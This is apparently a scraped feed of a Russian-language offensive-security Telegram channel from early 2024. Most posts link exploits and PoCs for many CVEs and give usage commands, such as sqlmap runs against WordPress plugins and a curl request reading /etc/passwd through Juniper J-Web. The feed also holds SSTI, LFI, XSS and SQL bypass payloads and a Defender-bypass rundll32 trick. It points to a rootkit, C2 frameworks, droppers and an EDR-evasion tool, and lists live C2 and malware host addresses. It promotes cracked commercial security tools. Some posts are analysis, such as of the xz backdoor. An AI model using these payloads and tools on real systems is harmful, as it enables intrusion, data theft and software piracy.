Microsoft Activation Scripts (MAS)*Latest Version: 2.6Release date: 20-Apr-2024*download MASdownload windows ALL version + server + office#win |
Images
Images
|
2024-05-05 10:37:28 |
Ну да, у нас там адрес ЧАТа сменился#chat #/usr/bin/chat |
Images
|
2024-05-05 04:51:07 |
iPhone с Touch ID + хомячина ID*Так, то есть, теперь еще и хомяка покупать? #госуслуги #хомяки |
|
2024-05-05 04:40:04 |
systemd run tty*Очень хорошо !#terminal #systemD #lol |
Images
|
2024-05-05 04:33:59 |
Horacius (IAM) - Local privilege escalation, без учетной записи Windows.*CVE-2024-29417*Интересное, почитать |
Images
|
2024-04-30 08:08:18 |
Ппипец |
|
2024-04-30 07:36:34 |
None |
Images
|
2024-04-30 07:23:12 |
Жду |
|
2024-04-30 07:23:06 |
None |
Images
|
2024-04-27 11:04:59 |
CVE-2024-21345 Windows Kernel EoP*WriteUp*exploit#win #poc |
Images
|
2024-04-27 04:38:19 |
Доброго утраCVE-2024-26218 Windows Kernel Elevation of Privilege Vulnerability*Proof-of-Concept#win #lpe |
|
2024-04-26 20:15:32 |
Подтасовка результатов голосования: киберугрозы глобальным выборам. (лол что?))*Ребята из Mandiant выкатили занятный доклад "Poll Vaulting: Cyber Threats to Global Elections".Доклад интересен тем, что там очень смело составлены:* Действующие лица* Государства (РФ, Китай, Иран, Корея- та что с забавным толстым лидером)* Организации* Спецслужбы* Хактивисты* И тд—На главные роли почему то взяли: DDoS, кражу данных, и дикпик дипфейки с AI.На вторых ролях поинтереснее.*Приятного чтиваPoll Vaulting: Cyber Threats to Global Elections#подозрительные_лица |
Images
|
2024-04-26 17:30:52 |
Google Captcha Bypass*download#google #captcha #пятницИгавно |
|
2024-04-26 08:17:56 |
CVE-2023-20198 RCE CISCO IOS XE*Добавления/удаления пользователей и выполнения команд/системных команд cisco cli.*Список целей тут*exploit#cisco #rce |
Images
|
2024-04-25 09:20:38 |
Топ платформ для обучения и тренировки навыкам кибербезопасности и этичного хакинга#подборкаС каждым днем, цифровая безопасность становится одной из наиболее приоритетных задач для организаций и частных лиц. Каждый день появляются новые угрозы, требующие постоянного повышения уровня защиты и знаний, для их предотвращения. И лучше всего это делать на практике. Мы подготовили подборку обучающих платформ которые могут быть полезны как представителям «синих», так и «красных» команд.• Attack-Defense: Платформа для практики в области информационной безопасности с более чем 1800 лабораторными работами.• Alert to win: Учебная платформа, предлагающая задачи на выполнение кода JavaScript для обучения векторам XSS атак.• CryptoHack: Платформа для изучения криптографии через решение задач и взлом небезопасного кода.• CMD Challenge: Серия испытаний, предназначенных для проверки ваших навыков работы с командной строкой.• Exploitation Education: Платформа с ресурсами для обучения методам эксплуатации уязвимостей.• HackTheBox: Платформа для тестирования и улучшения навыков взлома и пентестинга.• Hackthis: Сайт, предлагающий различные испытания для хакеров для тестирования и развития их навыков.• Hacker101: Платформа CTF от HackerOne, предназначенная для обучения основам взлома и пентестинга.• Hacking-Lab: Платформа для обучения и соревнований в области кибербезопасности.• OverTheWire: Серия варгеймов, предназначенных для обучения навыкам информационной безопасности.• PentesterLab: Ресурс для обучения пентестингу и поиску уязвимостей через практические упражнения.• Hackaflag BR: Бразильская платформа для соревнований по кибербезопасности.• PentestIT LAB: Виртуальная лаборатория для практики взлома и пентестинга.• PicoCTF: Платформа соревнований по информационной безопасности, ориентированная на студентов.• Root-Me: Платформа для всех, кто хочет улучшить свои навыки в области кибербезопасности через практические задачи.• The Cryptopals Crypto Challenges: Набор задач, разработанных для обучения прикладной криптографии.• Try Hack Me: Платформа для изучения кибербезопасности через интерактивные упражнения.• Vulnhub: Ресурс для обучения пентестингу и взлому через практику на виртуальных машинах.• W3Challs: Платформа для веб-разработчиков и пентестеров для тестирования и улучшения своих навыков.• WeChall: Сайт для обучения и практики навыков в области информационной безопасности через участие в различных вызовах и заданиях.• LetsDefend: Платформа для обучения сетевой защите и реагированию на инциденты.• Vulnmachines: Платформа предлагает различные VM для практики навыков взлома и пентестинга.• Rangeforce: Образовательная платформа для обучения кибербезопасности с помощью симуляций и модулей обучения.• Pwn College: Образовательная инициатива, направленная на обучение навыкам кибербезопасности через серию практических заданий. • Codeby Games Уникальная платформа для специалистов информационной безопасности и программистов, желающих прокачивать свои навыки в области кибербезопасности, выполняя задания на захват флага (CTF).• Hackerhub Предоставляет бесплатные виртуальные машины для улучшения ваших навыков информационной безопасности.LH | Новости | Курсы | Мемы#рекомендация#рекомендации |
|
2024-04-25 05:05:40 |
CVE-2024-4040 CrushFTP RCE*CrushFTP во всех версиях до 10.7.1 и 11.1.0 на всех платформах позволяет неаутентифицированным удаленным атакующим читать файлы из файловой системы за пределами песочницы VFS, обходить аутентификацию для получения административного доступа и выполнять удаленное выполнение кода*Usage:python exploit.py -u https://example.com -p /etc/passwd*Exploit#rce #ftp |
Images
|
2024-04-24 13:32:02 |
Рекомендуем подписаться на новый блог @mirea*Все о web уязвимостях, парсинге, внутренней инфры (Active Directory и т.д), авторские статьи, заметки, утилиты.*Все статьи написаны на личном опыте, не несут теоретический характер, только то, что может встретиться на периметре🛡🔒—> ПОДПИСАТЬСЯ <—🔍 |
Images
|
2024-04-23 12:40:29 |
CVE-2024-27199 TeamCity server*CVE облегчает создание несанкционированной учетной записи администратора в обход ошибок 403 в домене.*usage:python RCity.py -t http://teamcity.com:8111 --verbose*Exploit#teamcity |
Images
|
2024-04-22 18:41:43 |
А был ли мальчик rootkit ?*Тут на Blackhat/2024 который asia, ресерчер Or Yair порылся в закромах windows.И пока он шел из из DOS в NT, набрел на интересные и казалось бы безопасные вещи, эксплуатация которых приводит к рутКированию хоста и выдают себя за файлы, каталоги и процессы.*тут крутой красивый PDF с blackhat*а тут тоже самое но + видеодемонстрации#windows #vuln #rootkit |
Images
|
2024-04-22 10:11:52 |
CVE-2024-21111 VirtualBox (Local Privilege Escalation) exploit#virtualbox #windows #lpe |
Images
|
2024-04-22 09:43:02 |
MetaSploit PRO + crackтам readme есть с пошагомvirustotal ясно говорит что это hackTool и вообще адварь, ну а что вы хотели от кряка ?))))На свой страх и риск#metasploitPRO |
|
2024-04-22 08:03:40 |
CVE-2024-20356Jailbreaking a Cisco appliance to run DOOM*Сам POC exploit*Ну как сам DOOM запустил на циске пододеяльнике почитать тут#IDDQD #IDKFA |
Images
|
2024-04-15 20:50:27 |
Так, по ПОТОа я как могу сотрудничаю с акк правительстенными организациями и и местнными региональными, слава горподи что успели забрать наших людей с семьей, мы ПОЛНОСТЬЮ берем на себя финансовоый воспрос по размещению ВСЕХ люледей*контакты ЗВОНИТЬ ТУТ ЖЕЕсли вам совсем плхохо и все проебано, звоните МНЕ, попытаюсь помочь 99187490947 |
|
2024-04-14 07:00:03 |
Бесконтрольное делегирование и повышение привилегий в домене !😜Образовательные мультики по утрам воскресенья !кофе, сырник.#чипИдэйл |
|
2024-04-14 05:29:59 |
Сегодня воскресеньедевочкам печеньеа мальчишкам дуракамтолстой палкой по бокамиBurp Suite Professional EditionВерсия 2024.3.1.1 Full Activated + Extensions#burp |
|
2024-04-13 10:31:38 |
CVE-2024-3400 Palo Alto GlobalProtect VPN (0-Day)*Тех детали - тут хорошо расписано*Сэмпл бэкдора - скачать тут (UPSTYLE Backdoor - update.py)*Аналитика от PaloAlto + адрсеса С2 серверов - можно глянуть тут#paloalto #vpn #0day |
Images
|
2024-04-12 18:49:45 |
Telegram Desktop RCE* "pywz" против "pyzw"Чьто ? руки тряслись чтоли ?)))*link#teleжga |
Images
|
2024-04-12 14:23:15 |
Юзать хэшы для поиска малвари для Linux — давно бесполезноПростой скрипт который самомодифицируется и будет дергать изменения криптографических хэшей при каждом запуске.#!/bin/shecho "Viva la Proxy Bar!"sha1sum $0echo "#$RANDOM" >> $0sha1sum $0Ну и в тему ЭЛИТНАЯ команда: 😂echo -ne '\x0'#LOL #linux #hash |
Images
|
2024-04-12 11:11:10 |
CVE-2024-21378 Microsoft Outlook Remote Code Execution*Описание работы внутри файла*POC exploit#outlook #exploit |
Images
|
2024-04-11 07:56:06 |
рубрика "мало кто помнит или 35+"*У TheBat в апреле вышла версия 11.1Такие дела.... 😏#tooOLD #theBAT |
Images
|
2024-04-11 05:42:20 |
ExploitGSM - Дополнительный exploit для ядра 6.5*ExploitGSM_5_15_to_6_1 - первый сплоитExploitGSM_6_5 - дополнительный сплоитOffsetGenerator - генератор смещенияwriteup.docx - что и как работает*dowmload#linux #exploit #kernel |
Images
|
2024-04-10 19:37:02 |
DDOS flooder 193.93.248.103забавный такой 😜 |
Images
Images
|
2024-04-10 13:37:09 |
CVE-2023-36047* Дырка в службе usermanager, которая копировала файлы из каталога, управляемого пользователем, что приводило к Elevation of Privilege. ЗаБагФиксили только часть операции копирования, а операция чтения все еще выполняелась в контексте NT AUTHORITY\\SYSTEM. Эту уязвимость можно использовать для получения SAM /SYSTEM/SECURITY из теневой копии. Патч уже есть и уязвимость отслеживается как CVE-2024-21447*Exploit#windows #eop |
|
2024-04-09 20:31:47 |
CVE-2024-2879 LayerSlider плагин для WordPress*Версии LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection*Недостаточне экранирование позволяет добавлять дополнительные SQL-запросы к уже существующим, как итог = можно использовать для извлечения конфиденциальной информации из базы данных.*POC usage:sqlmap "https:://OLOLO.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T or sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T#wordpress |
|
2024-04-09 13:40:46 |
CVE-2024-27316 Атака на http/2*Подробности уязвимости*Конкретно CVE-2024-27316 влияет на другие CVE:CVE-2024-30255 (untested)CVE-2024-31309 (untested)CVE-2024-28182 (untested) CVE-2024-2653 (untested)CVE-2024-27919 (untested)*Usage:go build./cve-2024-27316 -t 127.0.0.1:80 -p http -i 8192./cve-2024-27316 -t 127.0.0.1:443 -p https -i 8192*POC exploit |
Images
|
2024-04-08 19:54:44 |
CVE-2024-29269*Маршрутизаторы TELESQUARE TLR-2005KSH уязвимы для неаутентифицированных команд*Хантер показывает что есть 3307 девайсов*POC exploit |
Images
|
2024-04-08 15:16:45 |
Вся боль сетевиков и cisco 2960 😜*бегом ставить Packet Tracer Tracket Pacer#CCNA #song #lol |
|
2024-04-07 07:31:14 |
CVE-2024-3273*D-Link NAS версии:DNS-320L Version 1.11, Version 1.03.0904.2013, Version 1.01.0702.2013DNS-325 Version 1.01DNS-327L Version 1.09, Version 1.00.0409.2013DNS-340L Version 1.08Exploit + Tool#dlink #exploit #NAS |
Images
|
2024-04-07 07:13:14 |
Как работает бэкдор XZUtils SSHD*Образовательные мультики по утрам воскресенья, берите кофе с сырником, усаживайтесь |
|
2024-04-07 06:57:13 |
Pentes LAB - SCCM (red team tactics)*Часть 0х0 Часть 0х1 - Recon and PXEЧасть 0х2 - Low userЧасть 0х3 - Admin User*#redteam #sccm |
Images
|
2024-04-06 20:38:09 |
C2 Cloud веб-инфраструктура C2*Anywhere Access: Reach the C2 Cloud from any location.Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.*download #CC |
Images
|
2024-04-06 20:23:53 |
CVE-2024-30850*chaos-rat RCE*exploit |
|
2024-04-06 11:05:37 |
Jasmin ransomware web panel path traversal*Деанон операторов ransom панели Jasmin и сброс ключей дешифрованияexploit |
Images
|
2024-04-04 20:56:11 |
как реагирует SOC на фолс позитив ))) |
|
2024-04-04 18:10:55 |
Практическая скрытая беспроводная однонаправленная связь в среде IEEE 802.11*Хардварщики как всегда, нет им покоя, в целом молодцы ! Хорошо расписано !*ВОУ ВОУ почитать*#802.11 #тихоБудь |
Images
|
2024-04-02 19:25:12 |
OpenBSD IPv6 Multicast Forwarding Cache sysctl kernel heap overflow*exploit#openBSD #NFS |
|
2024-04-02 13:22:26 |
xzbot (CVE-2024-3094)*Рассужденияhoneypot+ Тестовый эксплоит для xz backdoor*Подобрать#xz #backdoor |
Images
|
2024-04-02 08:01:27 |
Cloudflare Bypass Script*download |
|
2024-04-01 06:34:40 |
С праздником 😝#SOC #1april |
Images
|
2024-03-31 10:21:29 |
xz-vulnerable-honeypot *SSH-ханипот с бэкдором XZ. CVE-2024-3094*download#xz #docker #honeypot |
|
2024-03-30 06:11:43 |
Backdoor в xz/liblzma (атака на цепочку поставок)part 4К врачу за мной будете.Делать то что ? Ну во первых нужно проверить версию либыxz -Vесли версия liblzma 5.6.0 или liblzma 5.6.1 - начинайте как я жрать таблетки (в arch linux прилетело), откатываемся до безопасной версии liblzma 5.4.1А вот в последнем обновлении debian таки хорошая версия, безопасная. |
Images
Images
|
2024-03-30 05:32:44 |
Backdoor в xz/liblzma (атака на цепочку поставок)part 3Ну и кто добавил вредонос ?*А ноги растут из 2021 года, когда был создан акк JiaT75 на гите.JiaT75 делает коммит, заменяя Safe_fprint небезопасным вариантом, делая еще одну потенциальную дырку.*В 2022 году добавляет патч к xz и появляется еще один коммитер Jigar Kumar. Вместе они парят голову Лассе Колину (разраб xz) и патч мерджится.Ребятам стали доверять и выдали креды к репозиторию.*В 2023 контактная почта в Google oss-fuzz меняется на JiaT75, а не на Лассе Коллина.И коммиты понеслись....*В 2024 году ребята меняю URL tukaani.org/xz/ на xz.tukaani.org/xz-utils/ который далее уводит на гит JiaT75. Отжали проект. Далее добавляются последнии коммиты уже с бэкдором и шлюхами |
|
2024-03-30 05:04:58 |
Backdoor в xz/liblzma (атака на цепочку поставок)part 2Часть AWK сценария декодирования #xz #backdoor реализует модифицированный алгоритм RC4.Нет ключа, состояние RC4 инициализируется напрямуюКлючевой поток применяется с помощью ADD, а не XOR. |
Images
|
2024-03-30 04:45:54 |
Backdoor в xz/liblzma (атака на цепочку поставок)*Утры.Вчера ближе к ночи в сети начала вируситься картинка (скрин 1), подпись к картинке гласила - "объектный файл с бэкдором. добавлены некоторые «тестовые» данные в исходное дерево, которые unxz'ются и (dd) вырезаются определенным образом, которые передаются в деобфускатор, написанный на awk-скрипте, и результат снова получает unxz'".Стало интересно, это часть чего? Явно же кусок не полный.В итоге выяснилось что это часть бэкдора для xz/liblzmaОткуда ноги выросли ? А у людей начал ssh тормозить, а точнее долго подключаться.Сам ssh xz/liblzma не использует, за то его используют всякие systemD, например для отправки логов.Отравленные версии xz тут:https://github.com/tukaani-project/xz/releases/tag/v5.6.1А обновленный код бэкдора тутhttps://github.com/tukaani-project/xz/commit/6e636819e8f070330d835fce46289a3ff72a7b89*Lzma — крайне распространенный продукт, который также юзается в очень многих прошивках Score 10 из 10#supplyCHAIN #xz |
Images
Images
|
2024-03-29 20:30:50 |
рубрика "перекрестись"*объектный файл с бэкдором, добавлены некоторые «тестовые» данные в исходное дерево, которые unxz'ются и (dd) вырезаются определенным образом, которые передаются в деобфускатор, написанный на awk-скрипте, и результат снова получает unxz'#ebatь |
Images
|
2024-03-29 19:32:48 |
CVE-2024-0582 *io_uring LPE linux*Если нужно описание, гуглите идентичную дырку за номером CVE-2023-2598#linux #lpe #ubuntu |
|
2024-03-29 04:47:15 |
CVE-2024-28085 - Смешная дырка в Linux 😜*Дырке 11 лет, дырка есть в обновлении которое вышло 27 марта 2024 года.Дырка проверена на Ubuntu 22.04 LTS и Debian 12.5Но есть ньюанс, нужно уже быть на сервере.*В общем почитайте, поддельные sudo запросы*POC #linux #sudo |
Images
|
2024-03-28 20:33:54 |
CVE-2023-6546 - GSM Multiplexing Race Condition*сплойт предназначенный для Ubuntu 18.04+20.04 LTS/Centos 8/RHEL 8 и позволяющий получить root-права посредством выполнения произвольного кода ядра в системах SMP.*exploit#linux #lpe |
Images
|
2024-03-28 14:35:44 |
None |
|
2024-03-28 14:30:11 |
Acunetix version 24.2windows + linux февраль 2024 |
|
2024-03-28 08:08:31 |
APT28 - OCEANMAP Backdoor & Exploring(Exploring its C2 Server Artifacts)*Analyzing*YARA#apt28 |
Images
|
2024-03-27 10:25:08 |
Cobalt Strike: Generating beacons for Linux*Ну вдруг вы не знали#cobalt #linux |
Images
|
2024-03-27 09:11:21 |
evolution of security |
Images
|
2024-03-27 05:18:57 |
CVE-2024-1086 Linux LPE *Универсальный эксплойт для повышения локальных привилегий , работающий на большинстве ядер Linux между версиями 5.14 и 6.6, Debian, Ubuntu.*download#linux #lpe |
|
2024-03-27 05:05:42 |
Exploiting CVE-2023-3390 in Linux kernel*Сначала с гита этот спич удалили (схерали ?) пару дней назад, но мы написали ресерчеру INSU YUN, и чувак любезно поделился, а мы делимся с вами, не успев проснуться. КОФЕ !!!*Читаем - One shot, Triple kill#linux #0day #1day |
Images
|
2024-03-26 14:44:16 |
CVE-2023-42931 Apple macOS LPE*Affected:MacOS Sonoma before 14.2MacOS Ventura before 13.6.3MacOS Monterey before 12.7.2*Весь путь тут#macos |
Images
|
2024-03-26 13:24:16 |
Ransom Ryukhttp://95.217.135[.190пасип 😏 |
Images
|
2024-03-26 09:09:28 |
Рубрика "отсыпь скринов"Делаем скриншот из UEFI |
|
2024-03-26 07:53:31 |
CVE-2024-20767 Adobe ColdFusion*Уязвимость чтения файловой системы#adobe |
|
2024-03-26 07:45:58 |
Хороший разбор малвари NanoCore\nancrat *Цепочка: Phishing | Fake Link > ZIP/DOC > Script/Loader > NanoCore > Persistence > Injection > Info Collection > C&C*READ |
Images
|
2024-03-25 20:26:48 |
Remote code execution в FreeBSD и OpenBSD Дырка в NFS*Опа, даже у титанов бывают проблемы |
Images
|
2024-03-24 18:57:17 |
Свежий проект dropperПроект, создает вредоносный дропер с поддержкой макросов Office для боковой загрузки DLL и встраивающий его в файл Lnk для обхода MOTW (функция защиты устройства от вредоносных файлов, загруженных из сети).Download#dropper #dll |
|
2024-03-24 14:17:54 |
CVE-2024-28116 Grav CMSexploit authenticated SSTI+RCEPOC |
|
2024-03-24 13:27:35 |
Где деньги Лебовски ?*NoMoney — это инструмент для сбора информации, который объединяет fofa, Zoomeye , censys, платформу Intergraph от Qi'anxin и 360quake. Как врут видно из названия, возможности этого инструмента на вышеперечисленных платформах бесплатны. *За бесплатным сыром сюда#freecheese #lol |
Images
|
2024-03-23 12:47:37 |
Linux 😊C=$(tput cols);L=$(tput lines);while :;do x=$(($RANDOM%$C));y=$(($RANDOM%$L));printf "\033[${y};${x}fF";done |
|
2024-03-23 12:34:55 |
Exploiting the libwebp Vulnerability, Part 2: Diving into Chrome Blink |
Images
|
2024-03-23 08:44:04 |
хммм, ну оке |
Images
|
2024-03-23 06:26:57 |
CVE-2023-36424Windows Kernel Pool (clfs.sys) Corruption Privilege Escalation exploit |
Images
|
2024-03-15 13:09:42 |
CVE-2023-6817Linux kernel: use-after-free in nf_tables*ДЫрка в ядре Linux nf_tables, приводит к DoS или LPE.Патч в версии linux 6.7-rc5Скомпилять POC можно так:gcc -o poc poc.c -lnftnl -lmnl |
|
2024-03-14 17:01:21 |
На ночь 3 минуты*exploits.club - Weekly Newsletter 12*Link |
Images
|
2024-03-14 12:37:41 |
%3C/script%20%3EилиmitsecXSS%22%3E%3Cinput%20%00%20onControl%20hello%20oninput=confirm(1)%20x%3E#xss |
Images
|
2024-03-14 11:57:30 |
CVE-2024-25153: Remote Code ExecutionFortra FileCatalyst*POC* |
Images
|
2024-03-08 23:11:38 |
Дамы инфобеза, всех с дн0м )))) 8 ))) |
Images
|
2024-03-07 07:31:22 |
Linux Privilege Escalation Cheatsheetпыщь |
Images
|
2024-03-07 06:32:50 |
CVE-2024-1403*Progress OpenEdge Authentication Bypass *exploit proof of concept |
|
2024-03-06 18:15:59 |
Уязвимость DataCube3POC сочетает в себе CVE-2024-25830 (неправильный контроль доступа) для извлечения паролей root и CVE-2024-25832 (неограниченная загрузка файлов) для развертывания reverse shell*POC |
|
2024-03-06 08:02:20 |
Bypass UAC |
Images
|
2024-03-06 07:00:13 |
XieBroC2C&CСлили в открытый доступ все, кроме кода командного сервера. download#C2 |
Images
|
2024-03-06 06:41:24 |
Server Side Template Injection Payload List{7*7}*{7*7}{{7*7}}[[7*7]]${7*7}@(7*7)<?=7*7?><%= 7*7 %>${= 7*7}{{= 7*7}}${{7*7}}#{7*7}[=7*7]если отдает 49 - цель уязвима#SSTI |
|
2024-03-05 20:52:16 |
Рубрика интересноВозможна удаленная атака в стиле Stuxnet с использованием Web-Based PLC Malware: ResearchersLink#stuxnet |
Images
|
2024-03-05 14:09:08 |
CVE-2024-27198обход аутентификации с использованием уязвимости альтернативного пути в JetBrains TeamCity Server*#jets |
|
2024-03-05 13:50:09 |
CVE-2024-21338*Годная статьяLazarus и руткит FudModule: за пределами BYOVD с нулевым днем от администратора до ядра* |
|
2024-02-25 05:06:22 |
None |
Images
|
2024-02-25 05:06:21 |
Ночью LockBit восстановил сервера, и выдал обращение |
|
2024-02-24 05:26:56 |
Banshee*Windows x64 Kernel Rootkit (Experimental)*Умеет:- Kill processes- Change protection levels- Elevate any process token to SYSTEM- Enumerating and erasing kernel callbacks- Protecting the driver file- Hide Process by PID*TODO list - обещает интересное расширение функционала*download win_rootkit#win #rootkit |
|
2024-02-23 21:36:13 |
CVE-2024-1651 exploit (RCE)*Дырка в Torrentpier v2.4.1, приложение уязвимо к небезопасной десериализации, поэтому - позволяет выполнять произвольные команды на сервере.#exploit #rce #linux |
|
2024-02-23 21:24:12 |
SSH-Snake Tool for ....lulz*Это идеальное сочетание лени, глупости и божьей искры )))То есть чуваки написали утилиту на базе ssh для КАРТОГРАФИРОВАНИЯ локалки, бегает с закрытыми ключами и бед не знает.Ну не удивительно что черные шляпы мигом взяли на вооружение 😆Правильное название должно быть ssh-wormТДН во все поля )*SSH-Snake *Почитать#worm #ssh |
Images
|
2024-02-21 20:54:10 |
ChatBot для WordPress*SQL-инъекция через параметр $strid в версии до 4.8.9 включительно*ТЫКНУТЬpython3 sqlmap.py -u 'http://OLOLO.ru:80/wp-admin/admin-ajax.php' --data='action=wpbo_search_response&name=test&keyword=test&strid=1' --level 4 --risk 3 --dbms mysql --banner -p stridа я споть |
|
2024-02-21 13:58:28 |
CVE-2024-25600 wordpress Exploit (RCE)*Дыра в плагине Bricks Builder*requirements:alive_progressbs4prompt_toolkitrequestsrich*#RCE #wordpress |
|
2024-02-21 09:13:58 |
ScreenConnect POC* Обход аутентификации для добавления нового пользователя-администратора в ConnectWise ScreenConnect.*Usage:python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!* |
|
2024-02-21 09:10:14 |
Ну понеслась |
|
2024-02-21 08:29:39 |
Linux — это теперь и CNAРубрика - Интересное, проект ядра Linux был принят в качестве органа нумерации CVE (CNA) для выявления уязвимостей, обнаруженных в Linux.Теперь еще и их мониторитьПочитать тут#vuln #linux #security |
Images
|
2024-02-21 04:58:43 |
Ждем exploit для ScreenConnect |
Images
|
2024-02-20 19:02:47 |
ALFA LOL teamhttp://34.101.157.124/bins/ |
Images
|
2024-02-20 13:26:04 |
Побег из VirtualBox 7.0.10ДЫрки в virtio-netПочитать можно про CVE-2023-22098, CVE-2023-22099, CVE-2023-22100*exploit#virtualbox #escape |
Images
|
2024-02-19 15:54:00 |
Все эти билайны и теле2 это только верхушка айсберга и перерастает в шпионский треш, да еще и очень быстро.Даже если просто переводить .md можно примерно прикинуть объемы затрагиваемых тем, структур, организаций и стран с их альянсами.Ноги выросли отсюда I-S00NВ общем китайский APT-подрядчик нормально так накинул на вентилятор, от iOS Spyware до физических имплантируемых устройств.В общем будет интересно, читаем вникаем дальше*Ну и да, кого в Китае расстреляютUPDATE: хороший разбор тут с переводами скринов на английский (читать снизу вверх за последние 19 часов)#APT |
|
2024-02-19 14:12:36 |
В дампе поля:APT41 - коменты будут ?*GUIDABONENT_IDABONENT_NAMELOGINPASSWORDACCOUNT_USR_BLOCK ABONENT_BLOCKDEVICE_BLOCKQUESTION ANSWERACTIVE_DATEDEACTIVE_DATEPACKET_TYPETOWNDEVICESUBSCRIBER_IDADDRESS_ID* |
Images
|
2024-02-19 13:39:02 |
Beeline потёк |
Images
|
2024-02-19 08:33:08 |
BurpSuite PRO version 2024.1.1.1+BurpBountyPro_v2.8.0 ru+eng+manual |
|
2024-02-19 05:24:09 |
KeyTrap in DNS (CVE-2023-50387)*Link |
Images
|
2024-02-18 03:44:31 |
Living off the False Positive*Полезное.Ну прям всем хорошо, blue team могут использовать для настройки своей логики обнаружения вторжений, а red team научиться сливаться с серой массой.LoFP |
Images
|
2024-02-16 12:01:02 |
CVE-2024-21413 Expect Script POC*Microsoft Outlook Remote Code Execution Vulnerability (through the preview panel) CVSS:3.1 9.8 / 8.5*Link |
|
2024-02-15 19:12:57 |
Прощай NGINX*ESXI умер пару дней назадтеперь и NGINX умерГлав разраб форкнул проект и теперь будет FreeNginxПочитайте письмо, как эффективные манагеры в очередной раз все обосралиhttps://freenginx.org/pipermail/nginx/2024-February/000000.html*В AUR уже что то появилось#fuck |
Images
|
2024-02-14 18:43:19 |
Грязный BASHоднострочник для быстрого обнаружения XSS в файлах PHP*rg --no-heading "echo.*\\\$_GET" | grep "\.php:" | grep -v -e "(\$_GET" -e "( \$_GET" -e "esc_" -e "admin_url" -e "(int)" -e htmlentities |
|
2024-02-13 14:33:34 |
CVE-2023-36845 и CVE-2023-36846Juniper Junos OS J-Web RCE*На все это дело есть и сплоит на питонено можно и в curlык*curl -kv "https ://OLOLO.com/about.php? PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"' |
Images
|
2024-02-13 08:29:19 |
Свежая техника обхода EDRКому лень читать всю статью то: техника основана на запуске малвари ДО загрузки библиотеки DLL EDR.Суть вот в чем, EDR должен внедрить свою DLL в каждый процесс, но если внедрять слишком рано - процесс крэшится, внедрять слишком поздно - так его уже малварь подчинила.Суммируем: нужно найти момент для загрузки малвари ЧУТЬ раньше, при инициализации процесса - тогда EDR в лохматой жопе.*Статья - Bypassing EDRs With EDR-PreloadingСорцы - EDR-Preloader#EDR #malware |
Images
|
2024-02-12 20:18:04 |
Windows Defender Detection Mitigation Bypass VulnerabilityWin LPEВ 2022 году hyp3rlinx рассказывал как можно обойти windows defender передав дополнительный путь при ссылке на mshtml, дырку пофиксили. НО, добавив пару запятых в старый трюк - и опять bypass. *то есть было и пофиксили:C:\sec>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666)магия запятой:C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)собака старая, трюки новые.CVE пока не имеет )#defender #bypass |
Images
|
2024-02-11 17:48:23 |
Bypassing SQL*payload:8%20or%207250%3d0725*для sqlmap:sqlmap -u 'http://OLOLO.com/anyfile.asp?id_test=8%20or%207250%3d07250' --dbs --random-agent ignore=500 - -code=200 -T tablename --columns -- no-cast*#sql #bypass |
|
2024-02-11 05:35:32 |
Xbox ? PlayStation ? NoUbiquiti switch ! |
|
2024-02-10 08:03:40 |
В поисках malware инфраструктуры *Если вам интересно как ищут всякие opedir, или C&C со всякими cobalt-strike, havoc или малварь вроде dark comet, то есть интересная статья, в статье 11 примеров на базе censys.*Исходя из статьи, можно немного прикрыть свой C2 от любопытных глаз*Tracking Malware Infrastructure#malware #c2 |
Images
|
2024-02-10 07:34:10 |
Pwning the Domain: Credentialess/Username*Большой и подробный ман от 7 февраля 2024*read#redteam #win #pwn #cred |
Images
|
2024-02-09 14:13:38 |
LFI*Payload: ".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" |
Images
|
2024-02-08 12:23:21 |
внесем немного конкретики о пинах BitLocker Key retrieval on a Windows 11, Lenovo X1 Carbon Gen 11 via SPI Sniffing.То есть на задней стороне материнки, есть тестовые пады, секурненько )))*Да, это TPM 2.0*Ну и почитать TPM SNIFFING#bitlocker #sniff |
Images
|
2024-02-04 19:04:23 |
x4n4x securityтематы молодец )))) |
|
2024-02-04 09:14:34 |
АДМИН проявись |
|
2024-02-04 05:34:54 |
Утры, как сами? Кофе, ? Давай два?))) |
|
2024-02-02 18:50:39 |
Lenovo X1 Carbon Bitlocker Key Sniffingкруто, 42.9 секунды |
|
2024-02-01 10:04:18 |
CVE-2023-6246: Heap-based buffer overflow in the glibc's syslogPOC(exec -a "`printf '%0128000x' 1`" /usr/bin/su < /dev/null)всем сегфолта ))))) |
|
2024-02-01 06:38:59 |
Docker 4 сыра дыркиwriteup тута на видео видно как можно заюзать дырку в docker runc#docker #escape |
|
2024-02-01 06:00:42 |
bypass XSS Cloudflare WAFEncoded Payload "><track/onerror='confirm\%601\%60'>Clean Payload "><track/onerror='confirm`1`'>#CF #bypass |
|
2024-01-31 18:35:48 |
Linux Kernel Exploitation (свежая версия)*1 часть - Getting started & BOF 2 часть - Exploiting race-condition + UAF 3 часть - Heap techniques#linux #kernel #hack |
Images
|
2024-01-31 18:30:59 |
LockBit 3.0 - ребят, напишите мне, я вам расскажу за репутационный риск менеджментесть пара мыслей#lockbit |
Images
|
2024-01-30 09:34:29 |
Рекомендуется к прочтениюИнтервью с yashechkaМои поздравления )))*#xman_series |
Images
|
2024-01-30 07:04:26 |
Наконец то была найдена АтлантидаНа легендарный остров-государство обманным путем вывозят Telegram, Steam, данные криптовалютных кошельков, данные браузера, а также пушнину и женщинРенТВ - call mehttp://5.42.64.32/login.php C2 Panel#cc #bot |
Images
|
2024-01-30 06:15:52 |
ARTToolkit*Интерактивная шпаргалка, содержащая полезный список наступательных инструментов безопасности и соответствующих им команд/полезных данных, которые можно использовать в redteam*Link |
Images
|
2024-01-30 04:40:50 |
CVE-2023-35636 Microsoft Outlook, связанная с раскрытием информации (утечка хеша пароля) — Expect Script POC*exploit#outlook |
Images
|
2024-01-23 06:02:33 |
